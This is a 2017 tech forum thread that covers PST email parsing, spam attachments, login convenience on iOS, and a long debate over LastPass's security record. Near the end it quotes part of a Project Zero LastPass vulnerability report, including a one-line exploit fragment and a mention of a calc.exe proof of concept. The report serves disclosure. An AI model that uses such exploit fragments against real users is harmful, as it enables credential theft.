|
Diametunim posted:Anybody have tips for parsing PST files? I need to grab every email sent or received in an eight month time-span. Once I've done that I need to comb through the emails for certain keywords. I've tried using the built in advanced features in outlook but for some reason Outlook isn't returning all of the results. I'd like to do this programmatically but searching for python libraries that can parse PST files doesn't bring up much. Maybe this is a chance to export the PST and use one of the encase machines in my office. New-MailboxExportRequest -ContentFilter {((Received -ge "10/01/2015") -and (Received -le "12/31/2015")) -or ((Sent -ge "10/01/2015") -and (Sent -le "12/31/2015"))}
|
#
?
Mar 17, 2017 12:26
|
|
|
|
| # ? Apr 28, 2024 03:06 |
|
|
It should be possible to knock up a quick powershell script to read the contents of a PST mounted in Outlook (there's a bunch of API classes and methods documented on MSDN for this sort of thing), but if it was me doing it I'd have to second the suggestion of using libpst+readpst
Mr Chips fucked around with this message at 11:10 on Mar 18, 2017 |
|
#
?
Mar 18, 2017 03:33
|
|
|
What is it about LastPass that makes it so bad? I use 1Password and I almost never hear about any earth shattering vulnerabilities but I don't know enough about them to know how they do things differently. Is it some kind of exposure thing? I'm not sure LastPass has an android app, and it was traditionally a OS X app and the lovely sluggish Windows version shows. More people using LastPass = more exploits found or is it something more fundamental like "those devs just don't know what they are doing?"
|
|
#
?
Mar 18, 2017 08:46
|
|
|
Boris Galerkin posted:What is it about LastPass that makes it so bad? I use 1Password and I almost never hear about any earth shattering vulnerabilities but I don't know enough about them to know how they do things differently. Is it some kind of exposure thing? I'm not sure LastPass has an android app, and it was traditionally a OS X app and the lovely sluggish Windows version shows. More people using LastPass = more exploits found or is it something more fundamental like "those devs just don't know what they are doing?" Imagine if the most popular password manager (and ergo the biggest target) was also the one with the devs who don't know what they're doing: Lastpass
|
|
#
?
Mar 18, 2017 11:16
|
|
|
Sheep posted:Are you sure it's an attachment and not an embedded image? That's often done so when the client loads the file they can track that someone (or something, but whatever) is checking the account, and then mark the address as a valid destination for future spam. 100% sure it was an attachment. Using that to spread a JPEG exploit is possible but based on that CVE it only seems to work with certain software and much older OSes (Windows XP) but on the other hand I am sure throughout the world there are still tons of machines running poorly updated copies of Windows XP.
|
|
#
?
Mar 18, 2017 12:56
|
|
|
Three-Phase posted:100% sure it was an attachment. Using that to spread a JPEG exploit is possible but based on that CVE it only seems to work with certain software and much older OSes (Windows XP) but on the other hand I am sure throughout the world there are still tons of machines running poorly updated copies of Windows XP. Barracuda spam filters got a mention recently because they don't scan emails above 256kB by default, on the basis that spammers don't send emails bigger than that but scanning large emails is more resource intensive. I'm a sure a spammer using a botnet would be fairly happy to use up more of somebody else's bandwidth to get more emails through to inboxes though. So it might just be to add size to the email while using a file format that isn't suspicious itself.
|
|
#
?
Mar 18, 2017 17:18
|
|
|
Scikar posted:Barracuda spam filters got a mention recently because they don't scan emails above 256kB by default, on the basis that spammers don't send emails bigger than that but scanning large emails is more resource intensive. I'm a sure a spammer using a botnet would be fairly happy to use up more of somebody else's bandwidth to get more emails through to inboxes though. So it might just be to add size to the email while using a file format that isn't suspicious itself. That's an interesting angle - the file size was about 200kB. The thing is there was no other content - no subject and no text. What's interesting is that at work (totally different account) there have been times where someone called me and requested something and in a rush I sent an email with no subject and no text, just an attachment (usually a picture of equipment or a reference document or whatnot). But yeah if they have a server sending messages 200kb versus 20kb makes a big difference. But if it's coming from a compromised machine or email address it's a "don't care" situation and it makes sense that larger emails (with non-executable or archived or encrypted contents) may slip through.
|
|
#
?
Mar 18, 2017 17:48
|
|
|
Based on what I've seen before, I'd safely bet that the image attachment is solely to get around spam text scanning in low end anti spam endpoints. It's been around so long that I can't imagine it still working though. Just ignore them.
|
|
#
?
Mar 19, 2017 00:59
|
|
|
https://twitter.com/hacks4pancakes/status/843299108504948736
|
|
#
?
Mar 19, 2017 04:13
|
|
|
Let's say I have a page with sensitive information on an Apache server. The server is running https-only and the sensitive information requires a login and password for access. An iOS user is frustrated because Safari won't just store the login details, so the iOS user must enter the login information manually every time. How much less secure is it to just make the resource accessible by entering an extremely long gibberish-filled URL? Let's ignore factors related to the iOS device, like losing the device or the device being compromised.
|
|
#
?
Mar 19, 2017 20:54
|
|
|
PBCrunch posted:How much less secure is it to just make the resource accessible by entering an extremely long gibberish-filled URL? Let's ignore factors related to the iOS device, like losing the device or the device being compromised. One big issue with doing that is that the credential will be logged by proxies or Apache, which could inadvertently leak. Why won't Safari save the login info? Will Chrome?
|
|
#
?
Mar 19, 2017 21:05
|
|
|
Why won't the iOS device save the credentials? I'd fix that rather than trying to make an obscured URL. I'm betting the reason is a bogus SSL cert since that definitely makes Chrome not want to save passwords, in which case Let's Encrypt is the answer.
|
|
#
?
Mar 19, 2017 21:06
|
|
|
wolrah posted:Why won't the iOS device save the credentials? I'd fix that rather than trying to make an obscured URL. I used Let's Encrypt. Chrome on my Android phone saves the password no problem, as do Chrome and Firefox on my desktop computer, but iOS refuses to do it. I get the nice green "Secure" lock when I visit the page in Chrome. I have no experience with iOS, so I don't know what the cause is.
|
|
#
?
Mar 19, 2017 21:09
|
|
|
If you're using http basic auth get them to bookmark https://user:pass@whatever
|
|
#
?
Mar 19, 2017 21:10
|
|
|
Seriously, the answer here is to figure out the underlying issue and figure out if it's fixable. I guess it's also a question of how sensitive this info is vs how hard it is to actually fix the problem vs how important the one user here is.
|
|
#
?
Mar 19, 2017 21:10
|
|
|
Khablam posted:Imagine if the most popular password manager (and ergo the biggest target) was also the one with the devs who don't know what they're doing: Lastpass Please explain.
|
|
#
?
Mar 19, 2017 21:38
|
|
|
Furism posted:Please explain. Last pass is a garbage fire of insecure coding practices, particularly in regards to the browser plugins. Tavis Ormandy keeps owning them over and over and over.
|
|
#
?
Mar 21, 2017 02:44
|
|
|
i think you're exaggera https://twitter.com/taviso/status/843965519371812864 ting a bit
|
|
#
?
Mar 21, 2017 02:49
|
|
|
I'd dig up my effort post that explains why fundamentally it is bad but Tavis' bug reports are good enough.
|
|
#
?
Mar 21, 2017 02:51
|
|
|
Cutting edge stuff: https://twitter.com/thezdi/status/842788469923442689
|
|
#
?
Mar 21, 2017 03:23
|
|
|
Absurd Alhazred posted:Cutting edge stuff: 
|
|
#
?
Mar 21, 2017 03:32
|
|
|
flosofl posted:Last pass is a garbage fire of insecure coding practices, particularly in regards to the browser plugins. Tavis Ormandy keeps owning them over and over and over. Yeah, OK, but is it because he focuses on LastPass only or because LP is bad? This sounds like the whole "there are no viruses on Mac because it's a safe OS" from a few years ago just because nobody bothered to write any.
|
|
#
?
Mar 21, 2017 08:57
|
|
|
I can be both bad and only look worse than the competition due to the focus on it. Being poorly written isn't really a thing that is only true because people are trying to find problems with it. As in, applying the same level of focus to all password managers might reveal them all to be complete poo poo, it isn't going to suddenly make LastPass secure.
|
|
#
?
Mar 21, 2017 10:18
|
|
|
Thanks Ants posted:I can be both bad and only look worse than the competition due to the focus on it. Being poorly written isn't really a thing that is only true because people are trying to find problems with it. Yes, and that isn't what I was implying. Sorry if I wasn't clear. Do we know for a fact it's poorly written, or just that there are some flaws? I don't think it's quite the same. I don't want to sound like I'm mindlessly defending LP. I'm just looking for the best password manager there is and if LP isn't that anymore then I want to understand why.
|
|
#
?
Mar 21, 2017 11:14
|
|
|
Furism posted:Yeah, OK, but is it because he focuses on LastPass only or because LP is bad? This sounds like the whole "there are no viruses on Mac because it's a safe OS" from a few years ago just because nobody bothered to write any. Travis focuses on all sorts of products that deal with "security." He's the John Wick of destroying security products. Mostly AV, but he's been on a last pass kick recently. He also tore 1pass a new one earlier, but people seem to ignore that. 
|
|
#
?
Mar 21, 2017 11:51
|
|
|
Furism posted:Do we know for a fact it's poorly written, or just that there are some flaws? I don't think it's quite the same. Read the bug reports like suggested? These aren't "a clever means was found to use X to do Y" but largely "basic common practices haven't been applied and I got the code to do something it wasn't meant to do in about 2mins of trying".
|
|
#
?
Mar 21, 2017 11:54
|
|
|
Furism posted:Yes, and that isn't what I was implying. Sorry if I wasn't clear. Nobody can really say how well written it is, it's not like they release the code, but this is the kind of thing where flaws are a big problem. So having any issues like these in a security product kinda makes it 'poorly written', in that it's failing to do what it sets out to do The trouble with LastPass is it's really convenient - all your passwords are automatically in the  , the browser plugin handles getting and updating those passwords for you, it works some internet magic to automatically determine the right credentials and where they should be pasted on the page, and it all just runs within the browser with an extension that pops up its own UI. There's a lot to go wrong in there, and the exploits that have come out have hit all of these different aspects, from insecure password handling, to malicious websites impersonating another domain so the password is automatically filled in, to phishing scams where the extension's login UI pops up (but it's actually in another web page if you look real closely)That and the fact it's so popular and centralised means it's a good target for people to attack - compromise their site and you can possibly get everything, spread an exploit around malicious pages/ads to grab a common site's credentials and you'll catch a decent chunk of LastPass users. That and the number of links in the chain make it inherently risky, so you have to trust they'll always be on top of things, but the exploits suggest they're not. Whether the convenience is worth it is up to you, but that's why it's not the 'best' password manager
|
|
#
?
Mar 21, 2017 12:11
|
|
|
Speaking of basic common practices not being applied: Firefox gets complaint for labeling unencrypted login page insecurequote:Update: Around the same time this post was going live, participants of this Reddit thread claimed to hack the site using what's known as a SQL injection exploit. Multiple people claimed that passwords were stored in plaintext rather than the standard practice of using cryptographic hashes. A few minutes after the insecurity first came up in the online discussion, a user reported the database was deleted.
|
|
#
?
Mar 21, 2017 12:22
|
|
|
we've had multiple arguments about lastpass in this thread when their security failures come to light so let's get this over withratbert90 posted:He also tore 1pass a new one earlier, but people seem to ignore that. note that compromise was june 2015 and their security guarantees on what an attacker can do with that information are absurdly inaccurate when compared to this november 2015 assessment. i've summarised that assessment before but for those who don't want to read the entire thing: Wiggly Wayne DDS posted:If your password manager, by default, has an unencrypted key stored (dOTP) that can be used to authenticate, obtain the encrypted vault key, decrypt the vault key, bypass IP restrictions, bypass 2FA and relies on local storage being impenetrable then you've got a bit of a design flaw. We've seen the damage in the past when Lastpass had an XSS problem that let an attacker grab any plaintext passwords from a vault silently. You're not storing your vault on a single system by virtue of using Lastpass so that is not the only possible angle of attack, and based on prior issues I can't comfortably advise people to use it for secure password storage. Especially given their response to the issues presented.
|
|
#
?
Mar 21, 2017 12:43
|
|
|
baka kaba posted:Nobody can really say how well written it is, it's not like they release the code, but this is the kind of thing where flaws are a big problem. So having any issues like these in a security product kinda makes it 'poorly written', in that it's failing to do what it sets out to do I mean I get that this opens up risks for the average person, but really it just sounds like the same old rules of common sense internet use still apply. Install uBlock, watching for phishing attacks, use OpenDNS when possible, etc. This is the case regardless as to whether or not you're using a password manager.
|
|
#
?
Mar 21, 2017 14:31
|
|
|
psydude posted:I mean I get that this opens up risks for the average person, but really it just sounds like the same old rules of common sense internet use still apply. Install uBlock, watching for phishing attacks, use OpenDNS when possible, etc. This is the case regardless as to whether or not you're using a password manager. uBlock blacklists ads. It doesn't audit the code of every wordpress blog you visit to check someone hasn't compromised it to use the LP exploit(s) against everyone visiting. The solution is to not use lastpass, not decide "other things I do for other reasons make me safe". It's honestly loving bizarre how far lastpass users will double-down on hand-waving the very very obvious issues it has, both in concept and execution of it.
|
|
#
?
Mar 21, 2017 17:32
|
|
|
Khablam posted:uBlock blacklists ads. I'm not a lastpass user, nor am I doubling down on protecting it. I'm just saying that most of the stuff you mentioned, including XSS attacks, is going to be an issue regardless of whether or not you're using last pass or really anything else. And yes, I'm aware that the exploits you're talking about are LP specific. e: Hey here's an idea, how about some suggestions for alternatives? That's what the dude was asking for. psydude fucked around with this message at 18:12 on Mar 21, 2017 |
|
#
?
Mar 21, 2017 18:06
|
|
|
psydude posted:I'm not a lastpass user, nor am I doubling down on protecting it. I'm just saying that most of the stuff you mentioned, including XSS attacks, is going to be an issue regardless of whether or not you're using last pass or really anything else. And yes, I'm aware that the exploits you're talking about are LP specific. Free: KeePass and Dropbox Paid: 1Password
|
|
#
?
Mar 21, 2017 18:33
|
|
|
OSI bean dip posted:Free: Fixed 
|
|
#
?
Mar 21, 2017 18:33
|
|
|
CLAM DOWN posted:Fixed It doesn't really matter in the end what your cloud storage option is provided you're securing the password database with a decent keyphrase and are using key files not stored in the cloud.
|
|
#
?
Mar 21, 2017 18:48
|
|
|
OSI bean dip posted:It doesn't really matter in the end what your cloud storage option is provided you're securing the password database with a decent keyphrase and are using key files not stored in the cloud. I know I just despise and distrust dropbox 
|
|
#
?
Mar 21, 2017 18:53
|
|
|
CLAM DOWN posted:I know I just despise and distrust dropbox Encryption works really well with Dropbox or other cloud storage, for exactly that reason. ecryptfs and encfs are pretty much made for this: set the Dropbox folder as the encrypted root, and mount the plaintext view wherever convenient. Then just work with your files normally via that plaintext view, and the encrypted backend gets updated transparently. Dropbox never sees anything that isn't scrambled to hell and back. e: Granted, this isn't much use for a program like a password manager that's going to use Dropbox in its own way, not yours. This is just in general.
|
|
#
?
Mar 21, 2017 19:12
|
|
|
lastpass vuln is up: https://bugs.chromium.org/p/project-zero/issues/detail?id=1209#c5quote:win = window.open("https://1min-ui-prod.service.lastpass.com/"); quote:LastPass responded and said they have NXDOMAIN'd 1min-ui-prod.service.lastpass.com while they investigate. quote:I've uploaded the exploit here:
|
|
#
?
Mar 21, 2017 19:19
|
|
|
quote:They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac. Quality.
|
|
#
?
Mar 21, 2017 19:33
|
|
|
|
| # ? Apr 28, 2024 03:06 |
|
|
quote:They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac. 
|
|
#
?
Mar 21, 2017 19:34
|
|
